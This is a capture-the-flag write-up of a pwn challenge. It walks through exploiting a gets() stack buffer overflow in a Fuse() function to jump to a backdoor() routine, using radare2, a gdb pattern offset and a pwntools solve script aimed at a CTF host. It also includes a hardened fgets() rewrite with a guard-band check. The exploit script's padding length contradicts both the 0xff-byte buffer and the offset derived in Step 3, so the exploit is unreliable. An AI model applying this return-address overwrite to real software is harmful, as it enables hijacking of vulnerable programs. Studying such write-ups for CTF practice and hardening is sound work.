# [EN] Tears of the Kingdom (Lite)
###### tags: `Writeup` `Pwn` `English`
> [name=FlyDragon]
## Step.1
By examining the source code, we can discover a buffer overflow vulnerability in the `Fuse()` function: `item_buf` is 0xff bytes, but `gets()` reads an entire line with no bound.
```c=
printf("What do you want to combine your Master Sword with?\n");
char item_buf[0xff];
gets(item_buf);
printf("Wow, you get a Master %s Sword!\n", item_buf);
```
There is also a suspicious `backdoor()` function.
The objective of this challenge is to exploit the buffer overflow to execute `backdoor()` and obtain the flag.
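For contrast, here is a hardened version of the same read, written as an added example for this writeup (not the challenge's own code): `fgets()` bounded by `sizeof item_buf` replaces `gets()`, the remainder of an over-long line is discarded so it cannot spill into the next read, and a self-check helper surrounds an `item_buf`-sized buffer with a guard band to show that a 300-byte line no longer writes past it. The function names `read_item`, `fuse`, `feed_line` and `stored_len_for_line`, and the use of `fmemopen()` to feed constructed input, are this example's own assumptions.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <string.h>

#define ITEM_BUF_SIZE 0xff         /* same size as the challenge's item_buf */

/*
 * Bounded replacement for the gets() call in Fuse(): stores at most
 * size-1 bytes in buf, strips the trailing newline, and discards the rest
 * of an over-long line so the following read starts on a fresh line.
 * Returns the number of bytes stored, or -1 on EOF with no data.
 */
long read_item(char *buf, size_t size, FILE *in)
{
    if (size == 0 || fgets(buf, (int)size, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0';         /* complete line: drop the newline */
    } else {
        int c;                     /* line was longer than the buffer */
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;                      /* drain the excess, never store it */
    }
    return (long)len;
}

/* Hardened Fuse(): same prompt and output, but no write past item_buf. */
void fuse(FILE *in)
{
    char item_buf[ITEM_BUF_SIZE];
    printf("What do you want to combine your Master Sword with?\n");
    if (read_item(item_buf, sizeof item_buf, in) < 0)
        return;
    printf("Wow, you get a Master %s Sword!\n", item_buf);
}

/* Feeds one constructed line through read_item() via an in-memory FILE. */
long feed_line(const char *line, char *out, size_t out_size)
{
    FILE *in = fmemopen((void *)line, strlen(line), "r");
    if (in == NULL)
        return -1;
    long n = read_item(out, out_size, in);
    fclose(in);
    return n;
}

/*
 * Self-check helper: builds a line of n_chars 'A's plus a newline
 * (constructed input) and reads it into an item_buf-sized region that is
 * followed by a guard band. Returns the stored length, or -3 if any guard
 * byte changed, which would mean the read overflowed the buffer.
 */
long stored_len_for_line(size_t n_chars)
{
    char line[1024];
    if (n_chars + 2 > sizeof line)
        return -1;
    memset(line, 'A', n_chars);
    line[n_chars] = '\n';
    line[n_chars + 1] = '\0';

    char frame[ITEM_BUF_SIZE + 16];
    memset(frame, 0x7f, sizeof frame);       /* guard band after item_buf */
    long n = feed_line(line, frame, ITEM_BUF_SIZE);
    for (size_t i = ITEM_BUF_SIZE; i < sizeof frame; i++)
        if (frame[i] != 0x7f)
            return -3;
    return n;
}

int main(void)
{
    fuse(stdin);
    return 0;
}
```

With the original `gets()`, the 300-byte line would run 45 bytes past `item_buf` and on into the saved registers; with `read_item()` the buffer holds exactly 254 bytes and the guard band is untouched.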
## Step.2
Use radare2 to examine the `backdoor()` function.
```
[0x00401110]> aaa
[0x00401110]> afl
[0x00401110]> pdf @ sym.backdoor
```

However, executing from the `push rbp` instruction onward results in an EOF (end-of-file) error,
so we jump directly to 0x401260 instead.
## Step.3
Next, we need to calculate the padding.
A segmentation fault occurs when the alphabet is repeated three times.
Alphabet:
```
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ
```
```
(gdb) info register
rbp 0x5252525251515151 0x5252525251515151
```
0x51 is 'Q' and 0x52 is 'R', so (read little-endian) the saved rbp was overwritten by the `QQQQRRRR` portion of the pattern.
Everything that precedes that portion is the padding.
## Step.4
Add the padding, followed by 8 'A's to overwrite rbp, and then append the target address to jump to.
Write a solving program:
```py=
from pwn import *

r = remote("lotuxctf.com", 10002)
r.sendline(b"3")  # choose the Fuse option; sendline() expects bytes

# Bytes that fill the stack up to the saved rbp (derived in Step 3)
padding = b"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP"
rbp = b"AAAAAAAA"          # 8 bytes overwriting the saved rbp
ret_addr = p64(0x401260)  # return address: inside backdoor() (Step 2)

r.sendline(padding + rbp + ret_addr)
r.interactive()
```